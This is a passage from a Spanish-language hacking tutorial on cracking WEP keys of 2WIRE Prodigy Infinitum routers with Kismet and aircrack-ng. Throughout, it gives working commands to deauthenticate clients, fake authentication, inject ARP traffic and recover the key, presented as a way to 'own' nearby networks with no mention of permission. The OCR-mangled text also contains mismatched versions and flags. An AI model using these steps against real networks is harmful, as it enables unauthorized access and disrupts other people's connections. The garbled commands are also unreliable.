que se explico sobre WEP y ya una ves entendido como funciona este sistema de
cifrado pasemos a la parte interesante de este documento donde se demuestra como
romper la llave de los famosos routers 2WIRE de prodigy infinitum y en dicho
caso de cualquier router con WEP habilitado.

2.- Requerimientos

Antes de empezar todo este rollo, veamos lo que necesitan para romper una
llave WEP, asi que revisemos lo que necesitamos y los puntos que est~n
en negritas es que son sumamente importantes:

1 .- Sistema Linux ( Mandriva, Gentoo, Ubuntu, Backtrack etc. )

2.- Tener un 2WIRE Access Point cercano o al menos con buena señal.

3.- Tarjeta inalambrica con chip Atheros o compatible con packet injection y

monitor mode.

4.- Aircrack instalado ( http://www.aircrack-ng.org )

5.- Suerte y paciencia.

Si necesitan saber que tarjeta comprar vayan a la siguiente pagina web:
http://aircrack-ng.org/doku.php?id=faq#which_is_the_best_card_to_buy
Si necesitan saber si su tarjeta es compatible con el paquete aircrack vayan a la

siguiente pagina web:



http://aircrack-ng.org/doku.php?id=compatibility

No tienen idea por que no funciona su tarjeta o que demonios pasa con
aircrack, vayan a las siguientes paginas web y pregunten sus dudas:
http://www.zonartm.org/board
http://forum.tinyshell.be/
http://madwifi.org/report

Asi que si tiene cualquier duda sobre cual es la mejor distribuci~n, cuanto
cuestan las tarjetas o si esta tarjeta que voy a comprar soporta lo que me
piden etc. No duden en preguntar en el foro de RTM Security o en dicho caso
mandarme un mail, asi que no tengan pena por preguntar.

Ya una ves dicho todo esto, espero que cumplan con todos los requerimientos
que se piden, que no son muchos, igual lo mas complicado de encontrar
seria la tarjeta wireless, pero pueden buscar en buscadores como google,
foros etc.

Pasemos a la parte donde se configura la tarjeta wireless y as~ como aplicando
el patch para que soporte packet injection. En cuanto a aircrack no creo
que haya mucho problema con la instalaci~n pero lo revisaremos de todos modos.

3.- Configurando e Instalando

Bueno ya para hacer esto r~pido, vamos al grano. En este caso estoy usando una
tarjeta Atheros con un chip Atheros ( AR5006EG ) y Ubuntu. El controlador para
esta tarjeta es madwifi y su ultima versi~n es 0.9.2 y necesitamos aplicar el
patch que aircrack nos da para poder realizar packet injection ( que despu~s
veremos ) para poder realizar nuestros ataques, vamos por pasos para que no se
pierdan:

1.- Abran su terminal y pongan sudo -H ­s (metan su contraseña) para convertirse

en root.
2.- ifconfig ath0 down
3.- rmmod ath_pci ath_rate_sample ath_hal wlan_scan_sta wlan 2>/dev/null
4.- svn checkout http://svn.madwifi.org/trunk/ madwifi-ng o bajen el snapshot directo de la pagina
5.- wget http://patches.aircrack-ng.org/madwifi-ng-r1679.patch
6.- cd madwifi-ng ; patch -Np1 -i ../madwifi-ng-r1679.patch
7.- make ; make install
8.- Si la instalaci~n les pide rem over los m ~dulos anteriores o viejos presionen "r".
9.- depmod -ae ; modprobe ath_pci
10.- A veces es recomendable reiniciar el sistema.

Ahora vamos a instalar aircrack ;)

1.- Abran su terminal
2.- wget http://download.aircrack-ng.org/aircrack-ng-0.6.2.tar.gz
3.- cd aircrack-ng-0.6.1
4.- ./configure ; make
5.- sudo make install
6.- Prueben si ya esta instalado:

pongan en la terminal aircrack-ng

Y espero que todo les haya salido muy bien para poder llegar a la siguiente
configuraci~n de la tarjeta que es ponerla en Monitor Mode, pero primero debemos
saber en que canal esta el router 2WIRE as~ que primero hagamos lo
siguiente:



1.- ifconfig ath0 up

2.- iwlist ath0 scan

3.- El canal se vera en esta l~nea Frequency:2.437 GHz (Channel 6) < - Ejemplo



Ya sabemos el canal del AP, as~ que usemos ahora airmon-ng:



1.- airmon-ng start ath0 6

2.- Se creara una interfaz llamada ath1

3.- E n otras tarjetas sim plem ente pongan "iw config ethX m ode m onitor" y aparecer~

Mode: Monitor.



Nota: En el primer p aso ten g an en cu en ta q u e yo p u se el n u m ero "6" p

or q u e ese es el can al el cu al el Access Point esta transmitiendo, asi que

puede variar en el suyo.

En caso de que no funcione el monitor mode de airmon-ng como de costumbre

vamos hacerlo a mano.



1.- wlanconfig ath create wlandev wifi0 wlanmode monitor ; ifconfig ath1 up

2.- echo '804' > /proc/sys/net/ath0/dev_type

3.- Verifiquen el Monitor mode en ath1



Hasta ahora lo ~nico que hemos hecho es configurar nuestra tarjeta inal~mbrica

para soportar packet injection, as~ como tambi~n instalar aircrack, el software

para romper la llave WEP y por ultimo simplemente poner nuestra tarjeta en el

canal del Access Point y en modo Monitor. Ahora si empecemos con la parte

interesante de este documento.



4.- 0wn1ng W3P



Ahora si han de decir, por fin la parte buena. Pues si, de hecho si esta es la

parte mas interesante y me parece donde a la mayor~a les interesa, as~ que

empecemos de una ves. Yo creo que son pocos los pasos que se tiene que seguir

para poder crackear esta madre, empecemos con abrir su terminal y hacemos un

sudo -H -s para convertirnos en root (recuerden ya debemos tener nuestra

interfaz inal~mbrica en m odo "M on itor"). S i quieren pueden crear una

carpeta llamada WEP para tener ah~ los IVS y los archivos que vayamos generando

;). Lo que hare primero para ver si hay clientes asociados con el Access

Point 2WIRE yo utilizo Kismet ya que es mas preciso que el paquete airodump-ng

para ver los clientes asociados aunque algunos prefieres airodump-ng, en

fin como ustedes quieran.







Nota: Aviso que puede tomar horas el recoger 300,000 IV's, asi que

tengan paciencia.

1.- mkdir wep

2.- nano /etc/kismet/kismet.conf

3.- E ditar la linea source de la siguiente manera; "source= m adw ifi_ag,w ifi0,atheros"



Nota:

madwifi_ag puede variar por el soporte que tenga su tarjeta vean README para

poder ver exactamente que sourcetype tienen.



4.- ejecutamos: kismet y tengan a la mano una l~piz o abran un nuevo documento

para ir pegando los datos. Oprimim os la letra "S " y despu~s elegimos la

opci~n "w ".



5.- Veremos la pantalla siguiente: Por razones de privacidad los

nombres ESSID,BSSID, IP's, MAC address, etc.. cambiaran de nombre.



ver [ crack_wep-000008 ]



6.- Despu~s podemos movernos con las flechas arriba, abajo sobre los Access

Point que detecta kismet, elegim os en este caso "IN F IN IT U M X X X " y oprim

im os la tecla "enter" qu e nos m ostrara la informaci~n del Access Point, en

este caso el BSSID.



Nota: Podemos tambi~n poner un lock channel con Kismet para que solo la interfaz escuche

conexiones en el canal que queramos, hay que hacer un Lock, oprimimos Shift+L y listo.



ver [ crack_wep-000009 ]





7.- Anotamos el BSSID del Access Point en este caso usare: 00:13:95:D5:F1:31 en

donde quieran en un archivo gedit o abran una nueva term inal y abran "nan o w

hatever" y ah~ peguen el BSSID, que ser~ de buen uso despu~s.







8.- Hay que volver al men~ principal solo oprim an la tecla "q" y regresaran, a

hora sobre el mismo Access Point que hab~amos elegido ahora apretamos la tecla

"c" y verem os los clientes conectados al Access Point.



ver [ crack_wep-000010 ]





9.- H ay que anotar de nuevo en tu archivo "w hatever" que creaste o donde este

peg ando todo los datos, la MAC del cliente que esta conectado al AP. En este

caso utilizaremos 00:0C:F9:4E:42:A2



10.- Ahora algunos dir~n ¿ que dem onios es la "T " que ap arece a lado del M

ac Address? y por que abajo hay una "F ", buen o si presionan "h " podr~n ver su

respuesta, pero para ahorrarles tiempo F significa el cliente esta en LAN o

por cablecito y cuando vean una "T " o "E " p or lo regular son clientes

conectados por wireless, al parecer aqui tenemos 2 clientes conectados

mediante cable, as~ que no creo que sean muy ~til por lo tanto haremos un

falsificaci~n de un usuario al AP para as~ poder realizar nuestros

ataques. Pero primero pasemos a la etapa de cuando si tienen clientes

conectado mediante wireless y usaremos la misma MAC para el ejemplo.





11.- Pueden dejar su kismet abierto para ver si los clientes se desconectan o

que nuevos clientes se conectan tambi~n, pero si gustan pueden cerrar su

kismet y cuando corramos airodump-ng tambi~n podremos ver los clientes

conectados con al AP.



Cracking 2WIRE's con clientes (si no tienen, s~ltense todo esto) Lo primero que

debemos tener es a mano las MAC Address que tomamos de nuestro hermoso kismet as~

como tambi~n el BSSID del Access Point que vamos a crackear ;). En este caso

utilizaremos la BSSID 00:13:95:D5:F1:31 y nuestro cliente 00:0C:F9:4E:42:A2.



1.- Abrimos nuestra terminal y ejecutamos: airodump-ng --ivs -w ownage-c 6 ath1



"airodum p-n g " es nuestro sniffe r que capturara los paquetes IVs para poder

crackear la clave ;).



"---ivs" es la sentencia para capturar solo paquetes IV S .



"-w" es para escribir el nom bre del archivo donde se guardara n todos esos

paquetes.

"-c" es el canal donde espec~ficamente esta al AP, en este caso el

canal 6.



"ath1" en este caso es la interfaz que tenem os en m odo Monitor.



Mantengan esta ventana abierta y vean el numero de paquetes o datos que va

enviando el cliente al AP, esto son los IV's, pero para hacer mas r~pido el

cracking de la llave seguiremos con lo siguiente.



2.- Abrimos una solapa dentro

de la terminal u otra terminal, como gusten, y escriban PERO NO EJECUTEN:



aireplay-ng -e INFINITUM -a 00:13:95:D5:F1:31 -c 00:0C:F9:4E:42:A2 --deauth 10 ath1



"aireplay-ng " es nuestro program a que inyecta paquetes al A P para generar

trafico (IV ' s)

"-e IN F IN IT U M " en esta opci~n especificamos el nombre del

ESSID del AP.



"-a 00:13:95:D5:F1:31" la B S S ID o M ac A ddress de nuestro A ccess P oint.



"-c 00:0C:F9:4E:42:A2" nuestro cliente que inyectara paquetes.



"--deauth 10 " el ataque que haremos que es una deautentificaci~n al cliente

conectado 10 veces.



"ath1" la interfaz en monitor mode.



3.- Abrimos otra solapa y lo que haremos a continuaci~n es generar trafico

con el Access Point para generar IV's pretendiendo ser el cliente conectado realmente

ejecutamos:



aireplay-ng --arpreplay -b 00:13:95:D5:F1:31 -h 00:0C:F9:4E:42:A2 ath1



"aireplay-ng " nuestro program a que inyecta paquetes para generar trafico.



"--arpreplay" nuestro tipo de ataque que es el inyectar paquetes ARP ,conteniend o IV ' s.





"-b 00:13:95:D5:F1:31" B S S ID o M ac A ddress del A P .

"-h 00:0C:F9:4E:42:A2" M ac A ddress del cliente conectado al A P .

"ath1" la interfaz en m onitor m ode.



Ejecutamos este comando y lo que veremos es lo sig.



ver [ crack_wep-000012 ]



Cuando ya lo hayan ejecutado v~yanse a la solapa donde dejaron el comando para

deautentificar al cliente conectado al AP y ejec~tenlo. Despu~s de eso ver~n

como los ARP requests en la solapa de arriba empezaran a aumentar y llegaran

paquetes a lo loco generando los IV's necesarios para crackear la cuenta.





4.- Cuando

sientan ustedes que ya hayan captura los IV's necesarios ejecuten, en este caso a

mi me tomo solo juntar 300,000 IV's para crackear la llave de 64 bits que por

default tienen los m~dems 2WIRE: aircrack-ng -f 4 -m 00:13:95:D5:F1:31 -n 64

*.ivs



"aircrack-ng " nuestro program a que hace el cracking de la llave.



"-f 4" llam ado fudge qu e al aum entar su valor, aum entam os la posibilidad de tener

la llave.



"-m " nu estra M ac A ddress del A P .



"-n 64 " los bits de la llave, en este caso los 2WIRE por default tienen 64 bits.



"*.ivs" todos los archivos ivs generados.



Ejecuten y BINGO! Wep Key Found!



ver [ crack_wep-000012 ]





Cracking 2WIRE's sin clientes



Pr~cticamente son casi los mismos pasos pero solo cambiaremos un poco. Otra vez utilizaremos la BSSID

00:13:95:D5:F1:31 y nuestro cliente 00:0C:F9:4E:42:A2.



1.- Abrimos nuestra terminal y ejecutamos: airodump-ng --ivs -w ownage-c 6 ath1



"airodum p-n g " es nuestro sniffer que capturara los paquetes ivs para poder crackear la cla ve ;).



"---ivs" es la sentencia para capturar solo paquetes IV S .



"-w " es para escribir el nom bre del archivo donde se guardara n todos esos paquetes.



"-c" es el canal donde espec~ficamente esta al AP, en este caso el canal 6.



"ath1" en este caso es la interfaz que tenemos en modo Monitor.



2.- Abrimos una solapa dentro de la terminal y ejecuten:

aireplay-ng -e INFINITUM -a 00:13:95:D5:F1:31 -h 00:11:22:33:44:55 ­fakeauth 30 ath1



"aireplay-ng " es nuestro program a que inyecta paquetes al AP para generar trafico (IV's)



"-e IN F IN IT U M " en esta opci~n especificamos el nombre del ESSID del AP.



"-a 00:13:95:D5:F1:31" la B S S ID o M ac A ddress de nuestro A ccess P oint.



"-h 00:0C:F9:4E:42:A2" M ac A ddress falsa que crearemos y autentificaremos con el AP..



"--fakeauth" el ataque que harem os que es una autentificaci~n falsa con el AP para as~ poder

inyectar paquetes con este cliente falso.



"ath1" nuestra interfaz en m onitor mode.



ver [ crack_wep-000013 ]



3.- Abrimos otra solapa y lo que haremos a continuaci~n es generar trafico con

el Access Point para generar IV's pretendiendo ser el cliente conectado

realmente ejecutamos:



aireplay-ng --arpreplay -b 00:13:95:D5:F1:31 -h 00:0C:F9:4E:42:A2 ath1



"aireplay-ng " nuestro programa que inyecta paquetes para generar trafico.



"--arpreplay" nuestro tipo de ataque que es el inyectar paquetes ARP, conteniend o IV ' s.



"-b 00:13:95:D5:F1:31" B S S ID o M ac A ddress del A P .



"-h 00:0C:F9:4E:42:A2" M ac A ddress del cliente conectado al AP.



"ath1" la interfaz en m onitor m ode. Solo es cuesti~n de tiempo para que vean el aumento

de sus ARP, pero puede tomar tiempo.



4.- Cuando sientan ustedes que ya hayan capturado los IV's necesarios ejecuten,

en este caso a mi me tomo solo juntar 300,000 IV's para crackear la llave

de 64 bits que por default tienen los m~dems 2WIRE: aircrack-ng -f 4 -m

00:13:95:D5:F1:31 -n 64 *.ivs



"aircrack-ng " nuestro program a que hace el cracking de la llave.



"-f 4" llam ado fudge que al aumentar su valor, aumentamos la posibilidad de tener la llave.



"-m " nu estra M ac A ddress del A P .



"-n 64 " los bits de la llave, en este caso los 2WIRE por default tienen 64 bits.



"*.ivs" todos los archivos ivs generados. Ejecuten y BINGO! Wep Key Found!



Agradecimientos



Bueno mas que nada les quiero mandar un saludo a Alt3kx, bro, nitr0us, OpTix, fdisk,

dex, todo RTM.



As~ que pues ojala puedan hacer un feedback del documento y que RTM

Security siga creciendo.





Saludos a Todos!



Referencias



Experiencia Propia ;D

Coldfisher, "W ireless S ecurity Black Paper", 2006

Javier Sierra; Leonardo Betancourt, "Protocolo de Seguridad WEP", 2005

http://www.wi-fiplanet.com/tutorials/article.php/1368661